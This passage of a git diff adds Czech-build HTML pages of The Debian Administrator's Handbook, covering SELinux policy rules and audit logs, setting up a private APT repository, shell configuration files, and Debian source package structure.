+                        class="replaceable">class</em> describes the nature of the object (file, directory, socket, fifo, etc.). Finally, the last parameter describes the permissions (the allowed operations).
+						</div><div
+                      class="para">
+							Permissions are defined as the set of allowed operations and follow this template: <code
+                        class="literal">{ <em
+                          class="replaceable">operation1</em> <em
+                          class="replaceable">operation2</em> }</code>. However, you can also use macros representing the most useful permissions. The <code
+                        class="filename">/usr/share/selinux/devel/include/support/obj_perm_sets.spt</code> lists them.
+						</div><div
+                      class="para">
+							The following web page provides a relatively exhaustive list of object classes, and permissions that can be granted. <div
+                        xmlns=""
+                        class="url">→ <a
+                          xmlns="http://www.w3.org/1999/xhtml"
+                          href="http://www.selinuxproject.org/page/ObjectClassesPerms">http://www.selinuxproject.org/page/ObjectClassesPerms</a></div>
+						</div></td></tr></table></div><div
+              class="para">
+					Now you just have to find the minimal set of rules required to ensure that the target application or service works properly. To achieve this, you should have a good knowledge of how the application works and of what kind of data it manages and/or generates.
+				</div><div
+              class="para">
+					However, an empirical approach is possible. Once the relevant objects are correctly labeled, you can use the application in permissive mode: the operations that would be forbidden are logged but still succeed. By analyzing the logs, you can now identify the operations to allow. Here is an example of such a log entry:
+				</div><pre
+              class="programlisting">avc:  denied  { read write } for  pid=1876 comm="syslogd" name="xconsole" dev=tmpfs ino=5510 scontext=system_u:system_r:syslogd_t:s0 tcontext=system_u:object_r:device_t:s0 tclass=fifo_file permissive=1
+</pre><div
+              class="para">
+					To better understand this message, let us study it piece by piece.
+				</div><div
+              class="table"><a
+                xmlns=""
+                id="id-1.17.8.6.8.10"></a><p
+                class="title"><strong>Tabulka 14.1. Analysis of an SELinux trace</strong></p><div
+                class="table-contents"><table
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="lt-4-cols gt-7-rows"
+                  summary="Analysis of an SELinux trace"><colgroup><col /><col /></colgroup><thead><tr><th>Message</th><th>Description</th></tr></thead><tbody><tr><td> <code
+                          class="computeroutput">avc: denied</code> </td><td>An operation has been denied.</td></tr><tr><td> <code
+                          class="computeroutput">{ read write }</code> </td><td>This operation required the <code
+                          class="literal">read</code> and <code
+                          class="literal">write</code> permissions.</td></tr><tr><td> <code
+                          class="computeroutput">pid=1876</code> </td><td>The process with PID 1876 executed the operation (or tried to execute it).</td></tr><tr><td> <code
+                          class="computeroutput">comm="syslogd"</code> </td><td>The process was an instance of the <code
+                          class="literal">syslogd</code> program.</td></tr><tr><td> <code
+                          class="computeroutput">name="xconsole"</code> </td><td>The target object was named <code
+                          class="literal">xconsole</code>. Sometimes you can also have a “path” variable — with the full path — instead.</td></tr><tr><td> <code
+                          class="computeroutput">dev=tmpfs</code> </td><td>The device hosting the target object is a <code
+                          class="literal">tmpfs</code> (an in-memory filesystem). For a real disk, you could see the partition hosting the object (for example: “sda3”).</td></tr><tr><td> <code
+                          class="computeroutput">ino=5510</code> </td><td>The object is identified by the inode number 5510.</td></tr><tr><td> <code
+                          class="computeroutput">scontext=system_u:system_r:syslogd_t:s0</code> </td><td>This is the security context of the process who executed the operation.</td></tr><tr><td> <code
+                          class="computeroutput">tcontext=system_u:object_r:device_t:s0</code> </td><td>This is the security context of the target object.</td></tr><tr><td> <code
+                          class="computeroutput">tclass=fifo_file</code> </td><td>The target object is a FIFO file.</td></tr></tbody></table></div></div><div
+              class="para">
+					By observing this log entry, it is possible to build a rule that would allow this operation. For example: <code
+                class="literal">allow syslogd_t device_t:fifo_file { read write }</code>. This process can be automated, and it's exactly what the <code
+                class="command">audit2allow</code> command (of the <span
+                class="pkg pkg">policycoreutils</span> package) offers. This approach is only useful if the various objects are already correctly labeled according to what must be confined. In any case, you will have to carefully review the generated rules and validate them according to your knowledge of the application. Effectively, this approach tends to grant more rights than are really required. The proper solution is often to create new types and to grant rights on those types only. It also happens that a denied operation isn't fatal to the application, in which case it might be better to just add a “<code
+                class="literal">dontaudit</code>” rule to avoid the log entry despite the effective denial.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>COMPLEMENTS</em></span> No roles in policy rules</strong></p></div></div></div><a
+                id="id-1.17.8.6.8.12.2"
+                class="indexterm"></a><a
+                id="id-1.17.8.6.8.12.3"
+                class="indexterm"></a><div
+                class="para">
+					It might seem weird that roles do not appear at all when creating new rules. SELinux uses only the domains to find out which operations are allowed. The role intervenes only indirectly by allowing the user to switch to another domain. SELinux is based on a theory known as <span
+                  class="emphasis"><em>Type Enforcement</em></span> and the type is the only element that matters when granting rights.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.6.9"></a>14.5.4.4. Compiling the Files</h4></div></div></div><div
+              class="para">
+					Once the 3 files (<code
+                class="filename">example.if</code>, <code
+                class="filename">example.fc</code>, and <code
+                class="filename">example.te</code>) match your expectations for the new rules, just run <code
+                class="command">make NAME=devel</code> to generate a module in the <code
+                class="filename">example.pp</code> file (you can immediately load it with <code
+                class="command">semodule -i example.pp</code>). If several modules are defined, <code
+                class="command">make</code> will create all the corresponding <code
+                class="filename">.pp</code> files.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apparmor.html"><strong>Předcházející</strong>14.4. Introduction to AppArmor</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-security-considerations.html"><strong>Další</strong>14.6. Other Security-Related Considerations</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.setup-apt-package-repository.html b/tmp/cs-CZ/html/sect.setup-apt-package-repository.html
new file mode 100644
index 000000000..3609f62c6
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.setup-apt-package-repository.html
@@ -0,0 +1,231 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">15.3. Creating a Package Repository for APT</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="prev"
+        href="sect.building-first-package.html"
+        title="15.2. Building your First Package" /><link
+        rel="next"
+        href="sect.becoming-package-maintainer.html"
+        title="15.4. Becoming a Package Maintainer" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.setup-apt-package-repository.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.building-first-package.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.becoming-package-maintainer.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.setup-apt-package-repository"></a>15.3. Creating a Package Repository for APT</h2></div></div></div><a
+          id="id-1.18.6.2"
+          class="indexterm"></a><a
+          id="id-1.18.6.3"
+          class="indexterm"></a><div
+          class="para">
+			Falcot Corp gradually started maintaining a number of Debian packages either locally modified from existing packages or created from scratch to distribute internal data and programs.
+		</div><div
+          class="para">
+			To make deployment easier, they want to integrate these packages in a package archive that can be directly used by APT. For obvious maintenance reasons, they wish to separate internal packages from locally-rebuilt packages. The goal is for the matching entries in a <code
+            class="filename">/etc/apt/sources.list.d/falcot.list</code> file to be as follows:
+		</div><pre
+          class="programlisting">
+deb http://packages.falcot.com/ updates/
+deb http://packages.falcot.com/ internal/
+</pre><a
+          id="id-1.18.6.7"
+          class="indexterm"></a><div
+          class="para">
+			The administrators therefore configure a virtual host on their internal HTTP server, with <code
+            class="filename">/srv/vhosts/packages/</code> as the root of the associated web space. The management of the archive itself is delegated to the <code
+            class="command">mini-dinstall</code> command (in the similarly-named package). This tool keeps an eye on an <code
+            class="filename">incoming/</code> directory (in our case, <code
+            class="filename">/srv/vhosts/packages/mini-dinstall/incoming/</code>) and waits for new packages there; when a package is uploaded, it is installed into a Debian archive at <code
+            class="filename">/srv/vhosts/packages/</code>. The <code
+            class="command">mini-dinstall</code> command reads the <code
+            class="filename">*.changes</code> file created when the Debian package is generated. These files contain a list of all other files associated with the version of the package (<code
+            class="filename">*.deb</code>, <code
+            class="filename">*.dsc</code>, <code
+            class="filename">*.diff.gz</code>/<code
+            class="filename">*.debian.tar.gz</code>, <code
+            class="filename">*.orig.tar.gz</code>, or their equivalents with other compression tools), and these allow <code
+            class="command">mini-dinstall</code> to know which files to install. <code
+            class="filename">*.changes</code> files also contain the name of the target distribution (often <code
+            class="literal">unstable</code>) mentioned in the latest <code
+            class="filename">debian/changelog</code> entry, and <code
+            class="command">mini-dinstall</code> uses this information to decide where the package should be installed. This is why administrators must always change this field before building a package, and set it to <code
+            class="literal">internal</code> or <code
+            class="literal">updates</code>, depending on the target location. <code
+            class="command">mini-dinstall</code> then generates the files required by APT, such as <code
+            class="filename">Packages.gz</code>.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> <code
+                      class="command">apt-ftparchive</code></strong></p></div></div></div><a
+            id="id-1.18.6.9.2"
+            class="indexterm"></a><div
+            class="para">
+			If <code
+              class="command">mini-dinstall</code> seems too complex for your Debian archive needs, you can also use the <code
+              class="command">apt-ftparchive</code> command. This tool scans the contents of a directory and displays (on its standard output) a matching <code
+              class="filename">Packages</code> file. In the Falcot Corp case, administrators could upload the packages directly into <code
+              class="filename">/srv/vhosts/packages/updates/</code> or <code
+              class="filename">/srv/vhosts/packages/internal/</code>, then run the following commands to create the <code
+              class="filename">Packages.gz</code> files:
+		</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cd /srv/vhosts/packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>apt-ftparchive packages updates &gt;updates/Packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>gzip updates/Packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>apt-ftparchive packages internal &gt;internal/Packages</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>gzip internal/Packages</code></strong></pre><div
+            class="para">
+			The <code
+              class="command">apt-ftparchive sources</code> command allows creating <code
+              class="filename">Sources.gz</code> files in a similar fashion.
+		</div></div><div
+          class="para">
+			Configuring <code
+            class="command">mini-dinstall</code> requires setting up a <code
+            class="filename">~/.mini-dinstall.conf</code> file; in the Falcot Corp case, the contents are as follows:
+		</div><pre
+          class="programlisting">
+[DEFAULT]
+archive_style = flat
+archivedir = /srv/vhosts/packages
+
+verify_sigs = 0
+mail_to = admin@falcot.com
+
+generate_release = 1
+release_origin = Falcot Corp
+release_codename = stable
+
+[updates]
+release_label = Recompiled Debian Packages
+
+[internal]
+release_label = Internal Packages
+</pre><div
+          class="para">
+			One decision worth noting is the generation of <code
+            class="filename">Release</code> files for each archive. This can help manage package installation priorities using the <code
+            class="filename">/etc/apt/preferences</code> configuration file (see <a
+            class="xref"
+            href="sect.apt-get.html#sect.apt.priorities">6.2.5 – „Managing Package Priorities“</a> for details).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> <code
+                      class="command">mini-dinstall</code> and permissions</strong></p></div></div></div><div
+            class="para">
+			Since <code
+              class="command">mini-dinstall</code> has been designed to run as a regular user, there's no need to run it as root. The easiest way is to configure everything within the user account belonging to the administrator in charge of creating the Debian packages. Since only this administrator has the required permissions to put files in the <code
+              class="filename">incoming/</code> directory, we can deduce that the administrator authenticated the origin of each package prior to deployment and <code
+              class="command">mini-dinstall</code> does not need to do it again. This explains the <code
+              class="literal">verify_sigs = 0</code> parameter (which means that signatures need not be verified). However, if the contents of packages are sensitive, we can reverse the setting and elect to authenticate with a keyring containing the public keys of persons allowed to create packages (configured with the <code
+              class="literal">extra_keyrings</code> parameter); <code
+              class="command">mini-dinstall</code> will then check the origin of each incoming package by analyzing the signature integrated to the <code
+              class="filename">*.changes</code> file.
+		</div></div><div
+          class="para">
+			Invoking <code
+            class="command">mini-dinstall</code> actually starts a daemon in the background. As long as this daemon runs, it will check for new packages in the <code
+            class="filename">incoming/</code> directory every half-hour; when a new package arrives, it will be moved to the archive and the appropriate <code
+            class="filename">Packages.gz</code> and <code
+            class="filename">Sources.gz</code> files will be regenerated. If running a daemon is a problem, <code
+            class="command">mini-dinstall</code> can also be manually invoked in batch mode (with the <code
+            class="literal">-b</code> option) every time a package is uploaded into the <code
+            class="filename">incoming/</code> directory. Other possibilities provided by <code
+            class="command">mini-dinstall</code> are documented in its <span
+            class="citerefentry"><span
+              class="refentrytitle">mini-dinstall</span>(1)</span> manual page.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>EXTRA</em></span> Generating a signed archive</strong></p></div></div></div><div
+            class="para">
+			The APT suite checks a chain of cryptographic signatures on the packages it handles before installing them, in order to ensure their authenticity (see <a
+              class="xref"
+              href="sect.package-authentication.html">6.5 – „Checking Package Authenticity“</a>). Private APT archives can then be a problem, since the machines using them will keep displaying warnings about unsigned packages. A diligent administrator will therefore integrate private archives with the secure APT mechanism.
+		</div><div
+            class="para">
+			To help with this process, <code
+              class="command">mini-dinstall</code> includes a <code
+              class="literal">release_signscript</code> configuration option that allows specifying a script to use for generating the signature. A good starting point is the <code
+              class="filename">sign-release.sh</code> script provided by the <span
+              class="pkg pkg">mini-dinstall</span> package in <code
+              class="filename">/usr/share/doc/mini-dinstall/examples/</code>; local changes may be relevant.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.building-first-package.html"><strong>Předcházející</strong>15.2. Building your First Package</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.becoming-package-maintainer.html"><strong>Další</strong>15.4. Becoming a Package Maintainer</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.shell-environment.html b/tmp/cs-CZ/html/sect.shell-environment.html
new file mode 100644
index 000000000..bbd4650c9
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.shell-environment.html
@@ -0,0 +1,201 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.6. Shell Environment</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.creating-accounts.html"
+        title="8.5. Creating Accounts" /><link
+        rel="next"
+        href="sect.config-printing.html"
+        title="8.7. Printer Configuration" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.shell-environment.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.creating-accounts.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-printing.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.shell-environment"></a>8.6. Shell Environment</h2></div></div></div><div
+          class="para">
+			Command interpreters (or shells) can be a user's first point of contact with the computer, and they must therefore be rather friendly. Most of them use initialization scripts that allow configuration of their behavior (automatic completion, prompt text, etc.).
+		</div><a
+          id="id-1.11.10.3"
+          class="indexterm"></a><a
+          id="id-1.11.10.4"
+          class="indexterm"></a><a
+          id="id-1.11.10.5"
+          class="indexterm"></a><a
+          id="id-1.11.10.6"
+          class="indexterm"></a><div
+          class="para">
+			<code
+            class="command">bash</code>, the standard shell, uses the <code
+            class="filename">/etc/bash.bashrc</code> initialization script for “interactive” shells, and <code
+            class="filename">/etc/profile</code> for “login” shells.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Login shell and (non) interactive shell</strong></p></div></div></div><div
+            class="para">
+			In simple terms, a login shell is invoked when you login to the console either locally or remotely via <code
+              class="command">ssh</code>, or when you run an explicit <code
+              class="command">bash --login</code> command. Regardless of whether it is a login shell or not, a shell can be interactive (in an <code
+              class="command">xterm</code>-type terminal for instance); or non-interactive (when executing a script).
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>DISCOVERY</em></span> Other shells, other scripts</strong></p></div></div></div><div
+            class="para">
+			Each command interpreter has a specific syntax and its own configuration files. Thus, <code
+              class="command">zsh</code> uses <code
+              class="filename">/etc/zshrc</code> and <code
+              class="filename">/etc/zshenv</code>; <code
+              class="command">tcsh</code> uses <code
+              class="filename">/etc/csh.cshrc</code>, <code
+              class="filename">/etc/csh.login</code> and <code
+              class="filename">/etc/csh.logout</code>. The man pages for these programs document which files they use.
+		</div><a
+            id="id-1.11.10.9.3"
+            class="indexterm"></a><a
+            id="id-1.11.10.9.4"
+            class="indexterm"></a></div><div
+          class="para">
+			For <code
+            class="command">bash</code>, it is useful to activate “automatic completion” in the <code
+            class="filename">/etc/bash.bashrc</code> file (simply uncomment a few lines).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Automatic completion</strong></p></div></div></div><a
+            id="id-1.11.10.11.2"
+            class="indexterm"></a><div
+            class="para">
+			Many command interpreters provide a completion feature, which allows the shell to automatically complete a partially typed command name or argument when the user hits the <span
+              class="keycap"><strong>Tab</strong></span> key. This lets users work more efficiently and be less error-prone.
+		</div><div
+            class="para">
+			This function is very powerful and flexible. It is possible to configure its behavior according to each command. Thus, the first argument following <code
+              class="command">apt</code> will be proposed according to the syntax of this command, even if it does not match any file (in this case, the possible choices are <code
+              class="literal">install</code>, <code
+              class="literal">remove</code>, <code
+              class="literal">upgrade</code>, etc.).
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> The tilde, a shortcut to HOME</strong></p></div></div></div><a
+            id="id-1.11.10.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.10.12.3"
+            class="indexterm"></a><div
+            class="para">
+			The tilde is often used to indicate the directory to which the environment variable, <code
+              class="varname">HOME</code>, points (being the user's home directory, such as <code
+              class="filename">/home/rhertzog/</code>). Command interpreters automatically make the substitution: <code
+              class="filename">~/hello.txt</code> becomes <code
+              class="filename">/home/rhertzog/hello.txt</code>.
+		</div><div
+            class="para">
+			The tilde also allows access to another user's home directory. Thus, <code
+              class="filename">~rmas/bonjour.txt</code> is synonymous with <code
+              class="filename">/home/rmas/bonjour.txt</code>.
+		</div></div><div
+          class="para">
+			In addition to these common scripts, each user can create their own <code
+            class="filename">~/.bashrc</code> and <code
+            class="filename">~/.bash_profile</code> to configure their shell. The most common changes are the addition of aliases; these are words that are automatically replaced with the execution of a command, which makes it faster to invoke that command. For instance, you could create the <code
+            class="literal">la</code> alias for the command <code
+            class="command">ls -la | less</code> command; then you only have to type <code
+            class="command">la</code> to inspect the contents of a directory in detail.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Environment variables</strong></p></div></div></div><a
+            id="id-1.11.10.14.2"
+            class="indexterm"></a><a
+            id="id-1.11.10.14.3"
+            class="indexterm"></a><div
+            class="para">
+			Environment variables allow storage of global settings for the shell or various other programs called. They are contextual (each process has its own set of environment variables) but inheritable. This last characteristic offers the possibility for a login shell to declare variables which will be passed down to all programs it executes.
+		</div></div><div
+          class="para">
+			Setting default environment variables is an important element of shell configuration. Leaving aside the variables specific to a shell, it is preferable to place them in the <code
+            class="filename">/etc/environment</code> file, since it is used by the various programs likely to initiate a shell session. Variables typically defined there include <code
+            class="varname">ORGANIZATION</code>, which usually contains the name of the company or organization, and <code
+            class="varname">HTTP_PROXY</code>, which indicates the existence and location of an HTTP proxy.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> All shells configured identically</strong></p></div></div></div><div
+            class="para">
+			Users often want to configure their login and interactive shells in the same way. To do this, they choose to interpret (or “source”) the content from <code
+              class="filename">~/.bashrc</code> in the <code
+              class="filename">~/.bash_profile</code> file. It is possible to do the same with files common to all users (by calling <code
+              class="filename">/etc/bash.bashrc</code> from <code
+              class="filename">/etc/profile</code>).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.creating-accounts.html"><strong>Předcházející</strong>8.5. Creating Accounts</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-printing.html"><strong>Další</strong>8.7. Printer Configuration</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.source-package-structure.html b/tmp/cs-CZ/html/sect.source-package-structure.html
new file mode 100644
index 000000000..4e9b13f40
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.source-package-structure.html
@@ -0,0 +1,267 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">5.3. Structure of a Source Package</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Binary package, Source package, dpkg, dependencies, conflict" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><link
+        rel="prev"
+        href="sect.package-meta-information.html"
+        title="5.2. Package Meta-Information" /><link
+        rel="next"
+        href="sect.manipulating-packages-with-dpkg.html"
+        title="5.4. Manipulating Packages with dpkg" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.source-package-structure.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-meta-information.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.source-package-structure"></a>5.3. Structure of a Source Package</h2></div></div></div><a
+          id="id-1.8.7.2"
+          class="indexterm"></a><a
+          id="id-1.8.7.3"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.7.4"></a>5.3.1. Format</h3></div></div></div><a
+            id="id-1.8.7.4.2"
+            class="indexterm"></a><a
+            id="id-1.8.7.4.3"
+            class="indexterm"></a><a
+            id="id-1.8.7.4.4"
+            class="indexterm"></a><a
+            id="id-1.8.7.4.5"
+            class="indexterm"></a><div
+            class="para">
+				A source package is usually comprised of three files, a <code
+              class="filename">.dsc</code>, a <code
+              class="filename">.orig.tar.gz</code>, and a <code
+              class="filename">.debian.tar.xz</code> (or <code
+              class="filename">.diff.gz</code>). They allow creation of binary packages (<code
+              class="filename">.deb</code> files described above) from the source code files of the program, which are written in a programming language.
+			</div><div
+            class="para">
+				The <code
+              class="filename">.dsc</code> (Debian Source Control) file is a short text file containing an RFC 2822 header (just like the <code
+              class="filename">control</code> file studied in <a
+              class="xref"
+              href="sect.package-meta-information.html#sect.control">5.2.1 – „Description: the <code
+                class="filename">control</code> File“</a>) which describes the source package and indicates which other files are part thereof. It is signed by its maintainer, which guarantees authenticity. See <a
+              class="xref"
+              href="sect.package-authentication.html">6.5 – „Checking Package Authenticity“</a> for further details on this subject.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="id-1.8.7.4.8"></a><p
+              class="title"><strong>Příklad 5.1. A <code
+                  class="filename">.dsc</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Format: 3.0 (quilt)
+Source: zim
+Binary: zim
+Architecture: all
+Version: 0.65-4
+Maintainer: Emfox Zhou &lt;emfox@debian.org&gt;
+Uploaders: Raphaël Hertzog &lt;hertzog@debian.org&gt;
+Homepage: http://zim-wiki.org
+Standards-Version: 3.9.8
+Vcs-Browser: https://anonscm.debian.org/cgit/collab-maint/zim.git
+Vcs-Git: https://anonscm.debian.org/git/collab-maint/zim.git
+Build-Depends: debhelper (&gt;= 9), xdg-utils, python (&gt;= 2.6.6-3~), libgtk2.0-0 (&gt;= 2.6), python-gtk2, python-xdg, dh-python
+Package-List:
+ zim deb x11 optional arch=all
+Checksums-Sha1:
+ 4a9be85c98b7f4397800f6d301428d64241034ce 1899614 zim_0.65.orig.tar.gz
+ 0ec38c990ec7662205dd0c843bf81f9033906a2e 10332 zim_0.65-4.debian.tar.xz
+Checksums-Sha256:
+ 5442f3334395a2beafc5b9a2bbec2e53e38270d4bad696b5c4053dd51dc1ed96 1899614 zim_0.65.orig.tar.gz
+ 78271df16aa166dce916b3ff4ecd705ed3a8832e49d3ef0bd8738a4fe8dd2b4f 10332 zim_0.65-4.debian.tar.xz
+Files:
+ 63ab7a2070e6d1d3fb32700a851d7b8b 1899614 zim_0.65.orig.tar.gz
+ 648559b38e04eaf4f6caa97563c057ff 10332 zim_0.65-4.debian.tar.xz
+
+-----BEGIN PGP SIGNATURE-----
+Comment: Signed by Raphael Hertzog
